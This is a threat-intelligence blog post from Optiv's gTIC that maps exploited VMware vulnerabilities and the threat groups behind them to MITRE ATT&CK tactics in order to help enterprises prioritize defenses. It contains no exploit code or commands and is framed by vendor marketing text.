Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 450 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
Optiv’s gTIC Prioritized Software and Services List + MITRE Tactics Part V: VMware Software and Products
This blog post is a continuation of our Optiv Global Threat Intelligence Center’s (gTIC) Prioritized Software and Services List series. The list provides a high-level introduction to the frequently exploited software, services, and protocols and associated MITRE ATT&CK Tactic mappings. The intent of researching, identifying, and prioritizing potentially high-risk products (based off attractiveness for, and frequency of, targeting by adversaries) is to supplement and support enterprise risk management, incident response preparedness, intelligence collection, and threat research. Follow-up reports will cover more details on adversaries, vulnerabilities, techniques, and real-world incidents (where applicable) pertaining to many of the software and services outlined in the original blog post.
This fifth blog post in the series covers exploitation trends and vulnerabilities in popular VMware products to support the gTIC’s inclusion of VMware products on our Prioritized Software and Services List.
Optiv’s gTIC has identified and categorized VMware as a Critical Enterprise Software vendor. As described in our initial “Prioritized Software and Services List,” products and software that fall under the category of “Critical Enterprise Software” are considered essential to business processes and continuity. These products enable internal and external system communications; web and application servers; and file and data hosting, management, storage, and sharing. Adversaries target these types of software and products to perform various actions, including accessing and exfiltrating data, gaining Initial Access through phishing (with malware or for credential theft), scanning and exploitation of insecure web-facing instances, installing backdoors and web shells to achieve Persistence, enumerating user credentials and privileges, discovering sensitive databases, and mapping out other parts of the network and environment.
VMware software includes some of the most widely used cloud and virtualization solutions in enterprise environments. The elevated risk profile for applicable organizations is based on the ubiquity of VMware products, as well as the severity and notoriety of known vulnerabilities and real-world compromises. While multiple VMware products have a strong presence in corporate environments globally, some are more frequently reported on than others. These include (but are not limited to) VMware vCenter, Workspace ONE, ESXi, vSphere, and Horizon. Independent of report frequency, if your organization owns or uses these or any other popular VMware products, prioritize accordingly.
Reports and observations show that adversaries leverage VMware products to navigate across 10 Tactics mapped to the MITRE ATT&CK framework. Specific MITRE ATT&CK Techniques for each of the observed Tactics include the following:
T1583.005 – Botnet: EnemyBot implemented exploits for VMware Workspace ONE and Identity Manager to identify and infect new devices and assets for use in future denial-of-service attacks.
T1190 – Exploit Public Facing Application: Remote code execution (RCE) vulnerabilities in VMware ESXi continue to remain one of the most favored attack vectors for cyber adversaries to gain a foothold and execute malicious code in victim environments. As recently as mid-2022, the Log4Shell vulnerability (CVE-2021-44228) was reportedly exploited to compromise VMware Horizon servers for Initial Access. Endpoints hosting vulnerable instances of vCenter Server can be exploited for Initial Access and chained alongside other VMware vulnerabilities for a complete system takeover.
T1203 – Exploitation for Client Execution: Exploitation of vulnerabilities in several VMware products, including Workspace ONE, vRealize, and ESXi, can allow adversaries to run malicious code remotely to install ransomware and cryptocurrency miners, copy files and directories from one location to another, or take full control over a client or system.
T1068 – Exploitation for Privilege Escalation: A local privilege escalation (LPE) vulnerability in VMware vCenter, CVE-2021-22015, was tested and proven to allow a low-privileged user to gain root access to the vCenter host. This can allow access to files and processes to reveal hashed credentials or run malicious code and scripts at root level.
T1211 – Exploitation for Defense Evasion: The exploitation of multiple 2022 access control and authentication weakness vulnerabilities in VMware Workspace ONE (CVE-2022-31685, CVE-2022-31686, and CVE-2022-31687) allow threat actors to bypass authentication mechanisms.
T1134.001 –Token Impersonation/Theft: A vulnerability in VMware Workspace ONE, CVE-2022-31869, resulted in the improper handling of session tokens (session fixation vulnerability). This could allow an actor with existing network and environment access to steal and impersonate valid session tokens to bypass authentication in VMware Workspace ONE.
T1562.001 – Disable or Modify Tools: Elevated privileges in clients and consoles like vCenter allowed threat actors to modify rules and controls in local firewalls to gain access to other environments like ESXi without detection.
T1212 – Exploitation for Credential Access: Adversaries can exploit vulnerabilities in endpoints hosting vCenter servers, like CVE-2022-22948, to obtain credentials to other sensitive systems—resulting in a chaining of multiple techniques and vulnerabilities for higher or complete system takeover.
T1555 – Credentials from Password Stores: vCenter has been exploited to acquire credentials from an attached or embedded PostgreSQL server to pivot to other connected VMware systems like ESXi.
T1018 – Remote System Discovery: Enumeration of hosts (e.g., ESXi) and virtual machines from management consoles like vCenter allows attackers visibility into connected services and systems for further deployment of backdoors and tools to elevate privileges or pivot to discovered systems.
T1210 – Exploitation of Remote Services: Exploitation and access into VMware consoles and clients can allow attackers to gain access to managed or connected hosts, virtual machines, and servers, which allows propagation across multiple systems.
T1005 – Data from Local System: Vulnerabilities in ESXi have been exploited to transfer files from the compromised ESXi host to and from guest VMs.
T1486 – Data Encrypted for Impact: Ransomware has been deployed as a secondary and post-intrusion technique following the compromise of multiple VMware services, including VMware Workspace ONE, vSphere, and ESXi.
T1496 – Resource Hijacking: A server-side template injection vulnerability in VMware Workspace ONE (CVE-2022-22954) was previously exploited to deliver ransomware, as well as the GuardMiner cryptocurrency miner.
The following chart shows the most popular and widely covered VMware products—Workspace ONE suite, vSphere, ESXi, vCenter, and VMware Horizon—mapped to various MITRE Tactics. The chart also shows associated threats, including malware, adversaries, and popular vulnerabilities assessed to pose a high risk to organizations or that cyber adversaries have exploited over the last 24 months.
Cyber adversaries are known to exploit vulnerabilities in VMware products to accomplish numerous objectives. These objectives include delivering various types of payloads and implants like backdoors and web shells, deploying ransomware to destroy virtual and backup environments, exploiting systems for Initial Access and discovery of the compromised environment, and establishing a foothold for botnets. Research and observed incidents of compromises involving VMware exploits also validate Optiv gTIC’s long-standing assessment that threat actors will continue to exploit old vulnerabilities (two years and older) in popular software and services due to the continued demonstrable, proven exploit success over time.
Aside from zero-day exploits, research shows that adversaries have scanned for and exploited critical vulnerabilities in VMware ESXi, Horizon, vCenter, vSphere, and VMware Workspace ONE within 48 hours of disclosure, excluding zero-day vulnerabilities. It is therefore highly time sensitive for enterprises to prioritize VMware software assets in an asset inventory and defense-in-depth program. Threat actors known to have exploited VMware products as part of their campaigns include the Lazarus (Democratic Republic of Korea) and APT35 (Iran) state-sponsored groups. Multiple ransomware cartels, including the Conti, AvosLocker, RansomExx, and Hive groups, have also exploited VMware products. This is Likely due to VMware’s ubiquity across enterprise environments, management and access to data and accounts, and internet-facing position—making the critical vulnerabilities in these products a key target for Initial Access, Discovery, and Privilege Escalation.
Remote Code Execution (RCE) (i.e., server-side injection) and authentication bypass vulnerabilities in VMware products are among the most critical types of vulnerabilities. These vulnerabilities allow attackers to execute code, upload arbitrary files, or gain unauthorized privileged and root-level access to sensitive systems. Adversaries can also steal credentials from VMware consoles and connected databases to elevate privileges to manipulate, add, or delete defensive measures, credentials, and files, as well as gain access to sensitive directories and systems.
Vulnerabilities found in ESXi from 2019-2021 (e.g., CVE-2019-5544 and CVE-2020-3992) were observed in exploitation attempts as recently as 2022 and 2023. These attempts include ransomware incidents (e.g., ESXiArgs and RansomExx ransomware groups). Affiliates and operators of multiple ransomware groups are observed to exploit ESXi to deploy post-exploitation tools and encryption malware, including Alphv/BlackCat, AvosLocker, Babuk, REvil/Sodinokibi, and DarkSide/BlackMatter. ESXi vulnerabilities are also favored as attack vectors for Initial Access and post-exploitation operation by APT groups like UNC3886, which has leveraged zero-day vulnerabilities in ESXi (CVE-2023-20867) for Privilege Escalation, Defense Evasion, and Execution. VMware ESXi is Very Likely to remain a target of exploitation by both cybercriminals (including extortion groups) and state-sponsored APT groups in cyber espionage activities.
Application frameworks like Log4j and Spring (owned by VMware) are also attractive targets for adversaries to exploit products running these frameworks. North Korea’s Lazarus APT group exploited the December 2021 Log4j vulnerability (CVE-2021-44228, Log4Shell) in VMware Horizon instances in a campaign observed between February - July 2022 to gain Initial Access in targets in the U.S. and South Korea. Post-exploitation activity included installing various backdoors for Persistence and Command and Control.
In a similar way that exploit kits evolve, botnets can also add exploits and tooling to their multi-module malware capabilities. EnemyBot, a prolific open-source botnet, is reportedly developed and maintained by threat actors capable of adapting to new attack vectors. The adversaries update the malware that can scan for newly disclosed vulnerabilities often and as early as within 24 hours (known as one-day vulnerabilities). In 2022, EnemyBot added exploits and scan capability for multiple vulnerabilities in popular software and services, including an RCE vulnerability in VMware Workspace ONE (CVE-2022-22954).
While not the focus of this blog post, Optiv’s gTIC also recognizes other VMware products that threat actors are Likely to exploit. While we will cover remote management software in a separate report, it is evident that products like VMware SaltStack are popular attack vectors for cyber adversaries.
The graphics below illustrate Optiv gTIC’s Threat Actor Metric™ calculated for selected cyber threat actors known to leverage VMware vCenter, Workspace ONE, ESXi, and Horizon as part of their attacks (see Appendix: References for an explanation of the Threat Actor Metric™).
Optiv Threat Actor Metric™ – The Optiv Threat Actor Metric™ was developed by Optiv’s gTIC and is a multi-faceted, qualitative approach to determine a cyber adversary’s or campaign’s potential threat to an organization or industry. The metric considers known and assessed non-technical capabilities and intentions and is scored out of a total possible of 100. The purpose of this metric is to provide an added layer of depth to risk-based intelligence analysis and support proactive and remediating recommendations by presenting a visualization of non-technical, qualitative risk factors of adversaries and threat campaigns. It is similar in function as to the United States Department of Defense’s CARVER targeting scale.
Link charts and graphs in this report were created by Optiv's gTIC leveraging the ThreatQuotient® Investigations platform.
In addition to Optiv’s own Enterprise Incident Management team’s incident response engagements and analysis and other sensitive sources, the following references provided additional information for this blog post:
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems | CISA
ESXi-Targeting Ransomware: The Threats That Are After Your Virtual Machines (Part 1) | VMware Security Blog
In Before The Lock: ESXi | Recorded Future
Rapidly evolving IoT malware EnemyBot now targeting Content Management System servers and Android devices | AT&T
VMware ESXi Servers: A Major Attack Vector for Ransomware | Forescout
CVE-2022-22948: Sensitive Information Disclosure in VMware vCenter | Pentera
VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors | Mandiant
vScalation (CVE-2021-22015)- Local Privilege Escalation in VMware vCenter | Pentera
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
VMware Security Advisory for CVE-2022-31685
VMSA-2022-0011: Questions & Answers
Lazarus Group Exploiting Log4Shell Vulnerability (NukeSped) | ASEC
Lazarus and the tale of three RATs | Talos Intelligence
Most Likely Course of Action (MLCOA) – The expected and probable tactics, techniques, and actions carried out by a threat actor. COA statements are well established and accepted in estimative and predictive intelligence assessments.
Most Dangerous Course of Action (MDCOA) – Tactics, techniques, or actions carried out or taken by an adversary that result in a worst-case scenario outcome or impact, regardless of probability. COA statements are well established and accepted in estimative and predictive intelligence assessments.
Words of Estimated Probability – Optiv’s gTIC employs the use of both probability statements for likelihood of events or actions and confidence levels for analytic assessments and judgements. Probability statements and confidence statements are inherently subjective; however, the gTIC leverages professional experience and intelligence fundamentals to deliver reasonable and relevant statements and assessments. Probability statements and the degree of likelihood of an assessed event/incident are modeled after the Intelligence Community Directive (ICD) 203: Analytic Standards, published by the United States’ Office of the Director of National Intelligence (ODNI), and are as follows:
Confidence statements, as defined by the gTIC, apply to reliability and relevance of information reported and are as follows:
Per ICD 203 standards, confidence-level statements are not combined with probability and degree of likelihood terms proposed in the above chart.
Optiv Security: Secure greatness.®
Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.
Let us know what you need, and we will have an Optiv professional contact you shortly.